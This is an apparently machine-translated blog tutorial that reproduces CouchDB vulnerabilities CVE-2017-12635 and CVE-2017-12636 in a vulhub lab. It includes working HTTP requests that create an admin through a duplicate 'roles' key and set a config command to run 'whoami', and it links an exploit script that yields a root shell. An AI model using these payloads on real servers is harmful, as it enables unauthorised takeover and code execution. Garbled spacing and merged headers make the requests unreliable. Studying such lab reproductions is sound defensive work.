Shulou(Shulou.com)05/31 Report--

This article shows you how to analyze Couchdb vulnerabilities CVE-2017-12635 and CVE-2017-12636. The content is concise and easy to understand. It will definitely brighten your eyes. I hope you can get something through the detailed introduction of this article.

CouchDB is an open source document-oriented database management system that can be accessed through RESTful JavaScript Object Notation (JSON) API. Apache CouchDB is focused on ease of use and becoming a "database that fully embraces web". It is a NoSQL database that uses JSON as the storage format, JavaScript as the query language, MapReduce and HTTP as the API.

Vulnerability impact version: less than 1.7.0 and less than 2.1.1

I. the principle of loopholes

CVE-2017-12635:Erlang and JavaScript are different in parsing JSON, which leads to differences in statement execution. This vulnerability allows any user to create an administrator, belonging to a vertical privilege bypass vulnerability.

For example: Erlang: > jiffy:decode ("{" a ":" 1 "," a ":" 2 "}"). {[{,}, {}]}

JavaScript > JSON.parse ("{" a ":" 1 "," a ":" 2 "}") {a: "2"}

Ps: when defining a pair of key-value pairs, the Eralang parser stores two values; javascript stores only the second value. However, when jiffy is implemented, the getter function returns only the first value.

CVE-2017-12636: due to the design of the database itself, the administrator can configure the database through HTTP (S). In some configurations, the path to the executable can be set to be executed within the scope of the database run.

CVE-2017-12635 combined with CVE-2017-12636 can realize remote code execution.

Second, prepare the environment

Attack aircraft (kali): 192.168.29.130

Attacked machine (Ubuntu): 192.168.29.141 (use vulhub to build an image environment)

Spare machine: real machine (including python3 environment)

Test environment address: https://vulhub.org/#/environments/couchdb/CVE-2017-12635/

Third, environmental construction

1. Download the vulnerability environment of vulhub, go to the corresponding directory, and use the command sudo docker-compose buildsudo docker-compose up-d to build the image environment.

two。 Check the IP address of the Ubuntu server (attacked machine) (192.168.29.141)

3. Access the couchdb (version 2.1.0 of this environment) http://192.168.29.141:5984/_utils/#login after the completion of the build

IV. Recurrence of loopholes

1. The crawl packet is sent to the playback module and exploits the CVE-2017-12635 vulnerability to create an administrator user with the user name xx and password: xx. Ps: by sending a packet containing two roles, you can bypass the limit. Erlang and JavaScript parse JSON differently, so this allows the current user to be given the identity of "_ admin"

PUT / _ users/org.couchdb.user:xx HTTP/1.1Host: 192.168.29.141:5984User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en Q=0.2Connection: closeUpgrade-Insecure-Requests: 1If-Modified-Since: Sat, 02 Dec 2017 15:49:03 GMTCache-Control: max-age=0Content-Length: {"type": "user", "name": "xx", "roles": ["_ admin"], "roles": [], "password": "xx"}

two。 Log in to the backend system using the newly registered account: xx, password: xx;

3. To exploit the CVE-2017-12636 vulnerability, you must log in to the administrator user to operate, so it needs to be exploited in combination with the CVE-2017-12635 vulnerability. The test environment is equipped with poc: https://github.com/vulhub/vulhub/blob/master/couchdb/CVE-2017-12636/exp.py. Download poc to modify the target IP and couchdb version information to realize the attack operation. 4.kali attack machine opens listening port 443.

5. Use the poc file downloaded in step 3 (the python3 environment of the standby machine, or the python3 environment of kali)

6. A session connection is established on the kali attack machine, and it is root privilege

7. Couchdb 2.x introduces clustering, so changing the configuration of API requires the addition of node name. In fact, this is also simple, we can access / _ membership with the account password: (you can also visit the link when you are logged in)

GET / _ membership HTTP/1.1Host: 192.168.29.141:5984User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en Q=0.2Connection: closeCookie: AuthSession=eHg6NUVGMEI4RDE6g1lmNPR5o8RIBREQUmfFXqZClJ4Upgrade-Insecure-Requests: 1If-Modified-Since: Sat, 02 Dec 2017 15:49:03 GMTCache-Control: max-age=0

8. As you can see, we have only one node here, whose name is nonode@nohost. Then, we modify the configuration of nonode@nohost to write files to the server:

PUT / _ node/nonode@nohost/_config/query_servers/cmd HTTP/1.1Host: 192.168.29.141:5984User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en Q=0.2Connection: closeCookie: AuthSession=eHg6NUVGMTlDRjk6DPmoeDMHF5ZuRX_Py20A1EL4JvcUpgrade-Insecure-Requests: 1If-Modified-Since: Sat, 02 Dec 2017 15:49:03 GMTCache-Control: max-age=0Content-Length: 16 "whoami > / 1.txt"

9. According to the monitoring information established in step 6, you can view the created file information at this time.

The above is how to analyze Couchdb vulnerabilities CVE-2017-12635 and CVE-2017-12636. Have you learned any knowledge or skills? If you want to learn more skills or enrich your knowledge reserve, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.